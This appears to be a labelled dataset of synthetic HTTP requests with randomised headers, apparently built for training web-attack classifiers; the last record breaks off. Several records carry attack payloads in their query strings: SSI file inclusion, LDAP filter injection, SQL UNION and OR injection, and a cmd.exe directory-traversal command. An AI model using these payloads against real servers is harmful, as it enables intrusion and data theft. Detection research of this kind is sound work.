If-Modified-Since: Fri, 16 Sep 05 01:32:25 UTC
If-Unmodified-Since: Fri, 07 Aug 09 22:34:52 CET
If-Match: "ABN6mbY117FhetX8zn"
If-None-Match: "wKoF@Z05cOCumK3xHfF"
If-Range: "RwMqNZoppBbHuPGkK"
Max-Forwards: 5735
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM T3BpNHNobmVlYnNEdzhyaVRpOWp1cnVvdHRlVWp0QXduMGkyZVM=
Authorization: Digest realm
Range: 3-90,72191-
Referer: http://www.adatWx.it/ar8t/trrby.aspx
TE: deflate
Trailer: TE
User-Agent: Mozilla/8.2 (X11; U; Open BSD i586 7.1; nr-qr; rv:7.5.1) Gecko/02608678
UA-CPU: MIPS
UA-Disp: 6357,331,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 669x1617
Via: 9.7 www.eica.htm
Transfer-Encoding: compress
Upgrade: geop/6.3, gadsi/7.1, Risfc/1.7, ieeeh8/4.3, ht1/2.2
Warning: 713 39.50.39.133 "niebsbmiarSc9ytx7u" 
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 660220011832076689
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

76igasSticf=403&JformR6uTG4Jcatca=1esu&ognrhr0afevz6M=ip&childoNPgEVxtermMch=dai&ssehwlaohai=lonfT9&Ehssrsiee=rphp'i&Z@H6pGpxmlF.Hh=62YRR2Vu8S.&EdcopyoHCTI=ke&Ahre3al=n41VzDzg3

End - Id: 7848
Start - Id: 40652
class: SSI
GET /e.DixeIY.sh?nnaioehnildEiv=sNtcy&RY5dYa6I1i=Et-le%5D&a2occ7=naee&craneslstnetkcn=42&Smonaen8lolrs=uqLkfX%40DEd&3UholnAgtz3bpIo=fpsle&TFCJC9eptmpautoexec-=%3C%21--+++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&Ehseesd=r6ae%25&dnLtsmoErolR5t6=oV-78j5i.h HTTP/1.1
Host: 29.57.218.122
Connection: keep-alive
Accept: text/*;q=0.1, image/*;q=0.6, application/rtf
Accept-Charset: windows-1257;q=0.9, macintosh, koi8-r
Accept-Encoding: gzip, gzip;q=0.5, compress, identity;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 26.207.222.161
Cookie: jv6smmgzu=81603;b77t=9;dFK.dl=86
Cookie2: $Version="96"
Date: Sat, 07 Mar 09 09:56:05 CET
ETag: "NHnMTZQ4fbJB5bX"
Expect: 6yeh
From: Doem@euee.uk
If-Modified-Since: Sun, 30 May 04 06:18:06 GMT
If-Unmodified-Since: Sat, 04 Dec 04 12:50:51 UTC
If-Match: "LTAtm8N3eA62IV2k0lg"
If-None-Match: *
If-Range: Mon, 22 Mar 04 05:10:19 GMT
Max-Forwards: 288
MIME-Version: 0.6
Pragma: i='kaAhda'
Proxy-Authorization: sfoht tsob=EeAAttxn
Authorization: loulwT 7Pmt9ia=y9cdl
Range: 027-674054,619264-
Referer: /t9needm/tryireG/e7herni.css
TE: trailers
Trailer: Authorization
User-Agent: skL.RS. http://www.xrioddF.org
UA-CPU: PowerPC
UA-Disp: 1159,7674,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: 2.4 131.155.158.42
Transfer-Encoding: gzip
Upgrade: ono/2.9, rvsstr/4.3, n2s/4.0, roa/8.5
Warning: 381 www.ehdcewa.js "Od6ygEdahSe9" 
X-Forwarded-For: 70.169.142.250
X-Serial-Number: 552421
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40652
Start - Id: 38816
class: LdapInjection
GET /5ti.js?apqem=+&Ccyk7ykn9=ihdsmptat&rniNeq=th%5C++ceeiugh+d8UcG&Ymi0eB=lt%3DaumaildYsshutdown&adiEoaedef4onbb=dP.g&window.openPechobinimggUr=ihfsr4nelbsnSf&stA=coyoh%29%28%26%28objectClass+%3D++++irnT*%29&evAlstEed=eswx HTTP/1.0
Host: 238.210.135.82:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: utf-7;q=0.1
Accept-Encoding: compress, deflate;q=0.5, identity;q=0.7, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-stale=19556
Client-ip: 103.147.207.153
Cookie: aFhTga7drms=Dntrtoco(sd;ikmhqtrwrtXf=2;3ba8toVI=a6easmi04obsa1mgu;uGtythlAhaeo=7;hveneoyy3=vinput
Cookie2: $Version="420"
Date: Tue, 19 Apr 05 10:52:53 CET
ETag: W/"XO.R8JWcEWuUM9wv"
Expect: 100-continue
From: Emhleev@7nsic.de
If-Modified-Since: Tue, 26 Dec 06 15:23:12 CET
If-Unmodified-Since: Sun, 08 Aug 04 09:39:35 GMT
If-Match: "HLWZlC.Es18LxLYdIi-J"
If-None-Match: "fkoWpz9bar71KXRdn"
If-Range: Sun, 17 Aug 08 14:03:29 GMT
Max-Forwards: 536
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Digest algorithm=MD5-sess
Range: 635-4999,578-28594,-3
Referer: /vfmyucEv/tcuuk/y0zptEl.png
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.2 (compatible; MSIE 1.4; Solaris; iirynOhhf)
UA-CPU: 68000
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 4.7 www.eaeuoi3g.htm, HTTP/7.4 164.138.4.82, 3.5 www.te6tc.shtml
Transfer-Encoding: gzip
Upgrade: ctrbt/2.3, eLc/5.5, Tey/4.2, adeltf/5.1
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38816
Start - Id: 6002
class: Valid
PUT /i8eaia5/dvhiuoKceeaao/n5/etrrciuhim.css? HTTP/1.1
Content-Length: 93
Content-Language: o1w,lisoait
Content-Encoding: identity
Content-Location: /oryl/tocn2Muk/tnearf/wdke.wmn
Content-MD5: em9oYXRvYW9ucm80dWF0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 10:17:38 GMT
Last-Modified: Sun, 23 Sep 07 05:09:00 GMT
Host: www.iriiait1.de
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: pd5h-tr4tule;q=0.2
Cache-Control: max-stale=353
Client-ip: 109.117.200.106
Cookie: 26fl=96079;aqutzsohcve=gssm>mhljc
Cookie2: $Version="7"
Date: Sat, 25 Sep 04 09:17:02 UTC
ETag: W/".CX1myNpTOWnQmhPJl"
Expect: trosia
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Sun, 06 Nov 05 16:48:07 CET
If-Unmodified-Since: Wed, 27 Sep 06 12:31:10 GMT
If-Match: "5dKDUWmfjbQqAts5v"
If-None-Match: "HvW.I.FMM6vif35CiW"
If-Range: Tue, 08 Feb 05 06:32:27 GMT
Max-Forwards: 5
MIME-Version: 4.3
Pragma: L=oana
Proxy-Authorization: ueyia tnem=hshmu4l
Authorization: idemhd 4h5L=ivnekuhb
Range: 49-556,54707-
Referer: http://www.eaactaf.it/au7ey4/l2nj2t.conf
TE: trailers,gzip;q=0.7,trailers
Trailer: Warning
User-Agent: ednde4meeetl4r
UA-CPU: PowerPC
UA-Disp: 0303,1172,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3062x279
Via: 3.9 26.75.225.245, 3.2 www.tnwx.gif, HTTP/8.6 www.ily8nilz.shtml
Transfer-Encoding: identity
Upgrade: sSsh0/2.9, sad61a/4.3, eEno/3.4, 1jEe/1.8, Sde/6.5
Warning: 330 www.Oteemon.tiff:442 "eenlria" 
X-Forwarded-For: 26.237.65.198
X-Serial-Number: 1285901452667782524
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

teIiseeli=lneerTni47s8&teefrdires6=4832&2a80Y=158962738&@K0@replaceeAmocha=uHs&ouiteeyv=81415

End - Id: 6002
Start - Id: 10909
class: Valid
GET /hq9s2whxwwcnmABl/tANcsjX3r_63Ul_9D1C/mdSvLf6.exe?Enetertyfe=3&oU@7execQrPS1rcpK=4&nwKlAI=shECRAoae&moOtneFvat=eau&secke=773743 HTTP/1.1
Host: www.e7eet1aE.org
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 5.199.85.210
Cookie: i--Bu=oRT;hneOtrPra=caoensnemrarsee2l;imgX42IT=07;R0aoaieirdi=1e=so;nsfArw1=qsocopyhegk ;rtPulhbeiinnea=>hiselectamechodsmail3e (hVrtelnet1b
Cookie2: $Version="2"
Date: Sat, 13 Dec 08 06:20:09 GMT
ETag: "W22zb6uh_JIyN.3rvW"
Expect: 100-continue
From: vk1Iw@qOcre0I.cz
If-Modified-Since: Thu, 19 Nov 09 09:39:02 GMT
If-Unmodified-Since: Sun, 10 Apr 05 05:02:04 UTC
If-Match: "cnAX3sqK6SgP8Wu"
If-None-Match: *
If-Range: Tue, 19 Jan 10 03:02:12 UTC
Max-Forwards: 637
MIME-Version: 6.5
Pragma: fetit=nmbhoSi
Proxy-Authorization: atsuIo ssTe=rsipu
Authorization: NTLM RGFpbGF0c0RMdGVhY3VobmV0dWhlYXFlb1RhZGllVWFsaWVuZw==
Range: 588592-19738,0954-52796,229852-
Referer: /ev1rto/teealodo/erwot1da/sgpwot.css
TE: trailers,gzip;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 7.9; kD-dn; rv:9.4.8) Gecko/20435876
UA-CPU: PowerPC
UA-Disp: 2674,4710,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 488x175
Via: 4.2 www.Il9sHAts.jpg:1737, HTTP/7.4 www.D9eVTtb.jpg, 6.4 158.62.138.49
Transfer-Encoding: gzip
Upgrade: xivl/0.5, eLO/6.4
Warning: 301 www.ebkTeia.jpeg "cruweuettgs" 
X-Forwarded-For: 71.88.65.132
X-Serial-Number: 70193457062638076597
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10909
Start - Id: 42335
class: SqlInjection
GET /n3bCSTiU5d/ruAHhPwDF/YA5eSnmthr/tUyyZ/caXWmx/h2EV_9ghrPzp-jPL6IW3.sh?7i=OR++++%27dy%27++%3D++++%27Sim%27%2B%27ple%27&aro4WnhoeTEf=864053931&rubDQeefjt=3&nir2m=26t&l13skaxdnna=%28n5%25utiu+chtacces&9eC=85293212&.WRZYvDPoC=eitpy65%2Bcti&HopenjwgetD4Jon=026&aoenxeadfnihmu=a&shoirepksaevBiS=109314&EnEae3b=4606547 HTTP/1.1
Host: 115.56.105.28
Connection: close
Accept: video/mpeg, audio/*, audio/basic
Accept-Charset: iso-8859-5;q=0.2, x-mac-cyrillic;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 59.166.67.8
Cookie: C.yFdivhZ=fjIA>eobject %rsdwf<Uldjw;oef=n0;aezgA5aWe=49Greplace
Cookie2: $Version="77"
Date: Thu, 21 Apr 05 19:14:37 UTC
ETag: W/"7R4TNu8EPA0e6Y-q"
Expect: 100-continue
From: taa7@n9I9.uk
If-Modified-Since: Thu, 05 Feb 04 05:29:01 GMT
If-Unmodified-Since: Fri, 09 Feb 07 13:45:23 GMT
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: Fri, 20 Aug 04 09:40:20 GMT
Max-Forwards: 168
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -183629,81875-7
Referer: http://www.xsidmed.de/titih1o6/neieirbu.sh
TE: gzip;q=0.6
Trailer: Accept-Encoding
User-Agent: meug64t6iaJe5tlnapoP
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: xdan/8.0 www.dls3tia.png
Transfer-Encoding: deflate
Upgrade: tkdit/5.2
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 43766358
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42335
Start - Id: 32850
class: Valid
POST /tDsJyPTcaI1-l4e3OG12/lY@/rXbbwe/hu/Fm/oMNPubYVXddxi.php? HTTP/1.0
Content-Length: 31
Content-Language: beasotNs
Content-Encoding: compress
Content-Location: /wozutee/w9nm/unth4/Dsucad/ntaa.swf
Content-MD5: bm5oaTdpaGhxam9hbHRlTg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Aug 08 09:51:56 UTC
Last-Modified: Fri, 24 Jun 05 06:48:30 GMT
Host: www.a4eayti9.gov:80
Connection: 89ph
Accept: video/*;q=0.7, video/mpeg;q=0.1
Accept-Charset: euc-kr
Accept-Encoding: *;q=0.0
Accept-Language: s-tng8oir, fzrma-ea;q=0.8, elnsitte-lk;q=0.2
Cache-Control: fq2rl='ol1tlio'
Client-ip: 50.137.205.249
Cookie: rna9ytkcUqwiqex=smtHsqo
Cookie2: $Version="7"
Date: Sun, 14 Aug 05 02:21:30 UTC
ETag: "ZVOW@Xu9AL9fJzvh"
Expect: 100-continue
From: 5awfaf@mr4qc.org
If-Modified-Since: Mon, 12 Apr 10 01:28:17 UTC
If-Unmodified-Since: Tue, 27 Mar 07 10:16:48 UTC
If-Match: "NDnVl0ROI8URR9lm"
If-None-Match: *
If-Range: "nXwtoW76s.8jl@x4"
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: Basic YXNpaG91cjpGaHI1aGVlaQ==
Range: 2086-1,90-
Referer: http://4sahFlso.gov/srxeg/fhat/lNdtkn/emaie.sh
TE: chunked,trailers,trailers
Trailer: Warning
User-Agent: zxwG (eQn4m.s; sn@n5RuUV; lwlVKaxLb9; wUQLdz; tePSsKdo)
UA-CPU: StrongARM
UA-Disp: 1358,6257,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: FTP/3.5 www.jqoe.html, tht/5.1 36.71.47.203, 3.6 www.nnrece.htm
Transfer-Encoding: ifesa
Upgrade: d8jw0/9.1
Warning: 539 174.52.125.218:7 "gaeepmhroih" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

nc02rxwrurfa=etsystemnt4efevrgI

End - Id: 32850
Start - Id: 20847
class: Valid
GET /t5/aPtLp3XhWz_zFczGFK-/nMN/jInuRm3tsimdhlat.js?t4s=meservicesropt8thp&sZBsTNwmdsthr=+z%28eh&s9oefea=W7hEacottqso&9dairmritansyG=+%40szohete+c&Ws39gh4mah=269&ed=761013 HTTP/1.1
Host: www.entmsq.it
Connection: keep-alive
Accept: text/plain;q=0.0, video/*
Accept-Charset: *;q=0.2
Accept-Encoding: identity, gzip, identity;q=0.0, compress, compress;q=0.7
Accept-Language: se-i, k1lsiTg-4i83
Cache-Control: no-store
Client-ip: 234.60.18.141
Cookie: 2ae=85693720;s7ZmXseK@Aez=havingteffh;ewms5m2tnst5sr=Us@2IlVcaIts%u2ehEr;twari8tP=group bylmzm9s
Cookie2: $Version="827"
Date: Thu, 25 Mar 04 05:10:26 UTC
ETag: "CVZllc0TPYNKV6f"
Expect: 100-continue
From: dnCSe5st@sqeawRtsa.cz
If-Modified-Since: Thu, 04 Oct 07 03:42:57 UTC
If-Unmodified-Since: Tue, 16 May 06 10:02:01 CET
If-Match: "sL5QFn7XgP37DSI"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM eWhIc25sb3NvbGNiZTRvOGVmZXBxcGhiaWdzaXNlZTV5dHRvcg==
Authorization: Basic bW4ybHJldjozZzRhcg==
Range: -8
Referer: http://GusTen.biz/xikEo.jsp
TE: deflate,deflate;q=0.2,trailers
Trailer: Referer
User-Agent: njL-iK http://www.hdcK.biz
UA-CPU: 68000
UA-Disp: 670,9690,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 073x1675
Via: ehs/5.0 92.36.132.170, 8.6 191.194.56.186, 7.5 67.224.194.25
Transfer-Encoding: deflate
Upgrade: deqrsi/3.0
Warning: 895 240.109.248.223 "xes3Sgad2essEorscnn" "Tue, 16 Mar 04 21:51:36 GMT"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 20847
Start - Id: 21068
class: Valid
GET /iA1thcik7eeHyeeaterb/@uUXNchildll/tI66hCeW3/Tnslt/oZMtIJgeJwl_o/ilGeV-RbdNA1l5RB/ep/5oNyet/icxjxqjmy/cuOd.pl?7ih2oxEwaBse0g=9&yel4sfs=itFqgrdVe&oden0Gmtea=085&sBE1=tdrT0ekrreirhanit&4eVterirlisi=2&3aoEkThEnsawe=9842170&3gPioop=qA79yp&0rsyuiT=0dwindow.open%2Fdrop+&loehMepojiIpro=en53mmits&eztds=90629&QZZfE=seyv6 HTTP/1.0
Host: 65.180.69.145
Connection: aeyVc
Accept: application/rtf;q=0.8, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: aaoeehT-j9, ce-k, neda6x-onqwt;q=0.6
Cache-Control: no-transform
Client-ip: 44.233.163.187
Cookie: Metdia9fdatz=4;zCaE=irn7l;3a9qthnn=rdNeoor udelete-hzo;sepbm=6895514422;cPh=ir8hza
Cookie2: $Version="56"
Date: Sat, 20 Feb 10 22:54:00 GMT
ETag: W/"ipwRsw15MI416@osrnl"
Expect: 100-continue
From: oAtrliet@taveotNi.be
If-Modified-Since: Mon, 31 May 04 21:29:22 UTC
If-Unmodified-Since: Tue, 16 Feb 10 21:30:50 GMT
If-Match: "simLQSIHtvc6Vfh"
If-None-Match: *
If-Range: *
Max-Forwards: 6849
MIME-Version: 8.0
Pragma: wintort5='8ic'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic aXNnZHR6c3U6aWR1ZGhzdGY=
Range: 966923-49277,-9,672714-
Referer: http://www.oiypl52r.biz/omEto/egsrccfs/nEsij.css
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: owrnse/9.3.8.2.2
UA-CPU: 68000
UA-Disp: 708,2630,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x776
Via: 5.5 23.144.124.78:939, 5.5 57.76.181.103, FTP/1.1 171.9.88.71
Transfer-Encoding: identity
Upgrade: 7ynff/7.0
Warning: 708 255.125.121.38 "eth4asnh" "Sun, 05 Aug 07 12:56:58 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21068
Start - Id: 43744
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: 246.124.177.173
Connection: close
Accept: audio/basic;q=0.9, image/*, application/postscript
Accept-Charset: isiri-3342;q=0.2, windows-1254
Accept-Encoding: 
Accept-Language: oxhetet-NfeB;q=0.9
Cache-Control: only-if-cached
Client-ip: 42.85.153.5
Cookie: oGCkxW1FI=Eh2;jnsq0mhftrd=onoeedhao
Cookie2: $Version="25"
Date: Sun, 12 Mar 06 22:50:56 UTC
ETag: "a4XXHLvpw1u1qBnnZ1v"
Expect: fe8gaSr=na4I2h
From: m8Lou@dteama.it
If-Modified-Since: Sun, 03 Jun 07 08:27:55 CET
If-Unmodified-Since: Wed, 05 Oct 05 19:59:45 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 2
MIME-Version: 3.3
Pragma: AsrtDh='ijIuteeA'
Proxy-Authorization: naeven zndoO=eonsiuNe
Authorization: tsohq waem=Aiunlimo
Range: 24481-,44476-
Referer: http://r53i.fr/acrtr/ahdRKlgs.jpeg
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: cmsuiunp (ogfD1tSGWt)
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 337x2229
Via: 1.0 www.Eutphf0.shtml:753, ean/7.0 182.255.63.183, FTP/2.6 181.231.241.123:00117
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 634 www.htFnf.png "gu4mczleeNsgdneeh" "Thu, 21 Aug 08 09:54:11 CET"
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 5495098139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43744
Start - Id: 41905
class: SqlInjection
GET /WpQq30/sdgfuedadcyhnhb7/autoexec1.jpeg?1enc=%27++%29+UNION+++ALL+++++SELECT+7is9ne+++++FROM++++ni2taln+++WHERE+++++%28%27%27++%3D+%27&SDS0dyall=96798187&iHCAcFGselecte=aioani&o16f=sigrDosoaraqe&ezGnRe4itebmt2u=xp_tk%26aselectrd%2BmwE+ifnnf&includeEzma2LXG=sjX&uh5iy=64490538&octd6=l7rmnEioankhnai&morseaEllrtnsie=echohb%26&euerverqa=l3i+ao&ocktstdco9tbu=e41cyNn%2Ft%3A%5D HTTP/1.1
Host: www.stKtaogj.uk:5800
Connection: enng
Accept: */*;q=0.8
Accept-Charset: iso-8859-4;q=0.0, x-mac-turkish;q=0.6, koi8, x-mac-hebrew;q=0.4, iso-2022-kr;q=0.8
Accept-Encoding: gzip;q=0.9
Accept-Language: tRstceM-e;q=0.0
Cache-Control: no-store
Client-ip: 199.227.44.84
Cookie: hthmaeu=f5=;4t=i c;sw3eosarty=eket8Pepxmlstylehhband4
Cookie2: $Version="24"
Date: Wed, 19 Aug 09 07:29:05 GMT
ETag: W/"NqsDhYv0afOW86tr"
Expect: nvsci=uffmeHo
From: whodpi@rrheriuA.net
If-Modified-Since: Tue, 19 Jul 05 21:15:05 GMT
If-Unmodified-Since: Sat, 10 Nov 07 23:23:12 GMT
If-Match: "xgcg6lFX8YmoD1R"
If-None-Match: *
If-Range: Sat, 15 Nov 08 11:01:21 UTC
Max-Forwards: 95
MIME-Version: 4.7
Pragma: 2=et
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: moao ssda=ilwhdez
Range: 814292-
Referer: /pwQatf/adho.jpeg
TE: trailers
Trailer: Via
User-Agent: 9GUe201Il6 http://www.san9e.st
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: aHg/1.9 www.dlooiew.tiff, atum0y/5.7 29.37.83.123, 6.6 19.238.102.28:7
Transfer-Encoding: identity
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 448 www.2nrepq.jpeg "aiunenenVr" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41905
Start - Id: 140
class: Valid
GET /7wsroEtd/GYWwgetgICxjK3c/i0A.XK43RYmCc7L/vo57niqreToLvRst/ulRsJTegyuewtesmes/uinpconnectL-rZ@2HlYm/inhaez4re3lla/iuaxjmaTeatteasich1n/ousnq5LocoKd9o/PRX_samiTzDqQdRP/amopear.cgi?txr3tazfha06=o%283r9iusrgHt%27aioeeirg&exuiiislbers8eh=6_H&ni9rlcmethut=oeqosn5en&rdebrihirmgysn=m&HwX5iVt-1j=%3F+nh&f3lsiS=01881940&omaea05rnSf=e695oorm HTTP/1.1
Host: www.b4ihz6.fr
Connection: atsB
Accept: */*
Accept-Charset: iso-8859-2;q=0.6, isiri-3342
Accept-Encoding: identity;q=0.1, identity, compress;q=0.1, compress, identity;q=0.6
Accept-Language: aqIn-jt43jcl;q=0.5, 8e2-sTeilr8;q=0.3
Cache-Control: no-transform
Client-ip: 117.29.168.145
Cookie: BXYZ1=pjrOlauvgEe;rdagti9iillje=2956;rssX=5954;ijr=1716005;ratshhyleouh=st9VyuT;hnuiw=h4aiiseaSesteD
Cookie2: $Version="4"
Date: Mon, 27 Apr 09 08:46:18 CET
ETag: "PX_EwalQw357oOxIm7_E"
Expect: 100-continue
From: yiboT07e@nnhseug2l.org
If-Modified-Since: Sat, 18 Apr 09 22:52:19 GMT
If-Unmodified-Since: Tue, 08 Nov 05 01:20:07 GMT
If-Match: "ELvysSOjNl0bNK.OcZ"
If-None-Match: "pAlj9m.4J1bGflUz"
If-Range: Fri, 13 Apr 07 12:51:47 GMT
Max-Forwards: 329
MIME-Version: 6.1
Pragma: hg5kl=AS
Proxy-Authorization: NTLM ZWhCaGFoOUZlZXNOZW5pOWRkNHRtOG9sbHNkZXNRaUdlUg==
Authorization: NTLM ZlQ5eGFpaWxlZXRhYjdpZGl1dHNzdHNpSW9lTmdvbnJ0Y2VzZDBsbmh0bA==
Range: 76-,9300-
Referer: /ahcw/Aessdt/f6roj/Mt7e.tar.gz
TE: gzip
Trailer: If-Modified-Since
User-Agent: w3uo/8.3
UA-CPU: StrongARM
UA-Disp: 1257,262,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9197x616
Via: npn/9.7 113.172.109.98, HTTP/1.5 230.64.241.201
Transfer-Encoding: compress
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 914 www.ttsus.htm "fefohwt1uaxatcsr" "Fri, 11 Sep 09 17:26:42 GMT"
X-Forwarded-For: 89.149.7.74
X-Serial-Number: 20731177155896988891
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 140
Start - Id: 34394
class: Valid
POST /tia3debretlq9uru/1rry6_B/nOl8pfu3JHDjAH-/hBYFD8h.Aiki9DSH1PD/jsZ5Qffu7/Minputp2ke0h/wfeohtp/sns9pThoStbg.tiff? HTTP/1.0
Content-Length: 71
Content-Language: ca
Content-Encoding: gzip
Content-Location: /gecoh9z.asp
Content-MD5: eTF0ZHJoSGU5c3JudG9xbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jul 08 08:02:45 CET
Last-Modified: Fri, 04 Jan 08 20:14:32 GMT
Host: 148.64.216.166
Connection: rEogr1o
Accept: */*;q=0.9
Accept-Charset: x-mac-japanese;q=0.2, iso-2022-jp, windows-1255;q=0.7
Accept-Encoding: identity, gzip;q=0.8, deflate, gzip;q=0.8
Accept-Language: *
Cache-Control: awi=ce
Client-ip: 245.163.168.164
Cookie: lahfdNugsTltee=1lzktof
Cookie2: $Version="27"
Date: Fri, 25 Dec 09 07:34:10 UTC
ETag: W/"eWRISGY7VTr40O95pw4Q"
Expect: 100-continue
From: naoi@4aeadhtTt.gov
If-Modified-Since: Tue, 10 Aug 04 02:16:15 UTC
If-Unmodified-Since: Thu, 22 Sep 05 10:55:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Mar 10 03:56:22 CET
Max-Forwards: 163
MIME-Version: 7.0
Pragma: aEjl='cme'
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: Basic Mm5naWVpdTpyaGhhaA==
Range: 369-272,49-76042
Referer: /vtdeini.sh
TE: trailers
Trailer: Accept
User-Agent: yDsB1fihW http://www.bdhiq.org
UA-CPU: PowerPC
UA-Disp: 8099,2582,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1952x0740
Via: 3.0 167.42.67.29, FTP/9.9 www.l8mi.tiff, 2.1 www.Rwcb.gif
Transfer-Encoding: gzip
Upgrade: lkUdx/0.6, ehnrud/5.0
Warning: 815 www.mdva.html "pnutn0bce" 
X-Forwarded-For: 122.10.14.138
X-Serial-Number: 212696659467412
----: ---------------------------------
~~~~~: ~~~~~~~~~~

ok=ie&eosrb=tjisa&pfnZKshutdownRVLRqin=i9.EDJ1C&espsixoxtEitsq=25545467

End - Id: 34394
Start - Id: 12706
class: Valid
GET /gOFsJl323passthruv/jijf/nOcCt2Vo3ZQZ/cmd2jUcS4XUpretcUxtermh/s1aht4mdn0yro/91aB.htm?c5il=np+usr&zenGtoeoh4L3lu=3378982&neEermtltgo1i=040&imnsaocfmid4=a&aiRHpohesers=oletepgnceuvarti&h3fcySsIu=esspphetgaNa32oni&2eteEoo=7435778&rediswelaiHpso=unS9 HTTP/1.0
Host: 8.196.14.225
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-8;q=0.7, macintosh, x-mac-arabic
Accept-Encoding: compress;q=0.1, gzip;q=0.9, deflate;q=0.0
Accept-Language: *
Cache-Control: td1='gAedw3'
Client-ip: 216.193.63.216
Cookie: eaycnl=06438
Cookie2: $Version="20"
Date: Sat, 31 Dec 05 18:29:48 GMT
ETag: W/"ef7Y_SliiiXwhzm"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Fri, 17 Dec 04 15:20:27 UTC
If-Unmodified-Since: Fri, 14 Mar 08 01:50:46 UTC
If-Match: "OJ9HCFUaQeWWWlV"
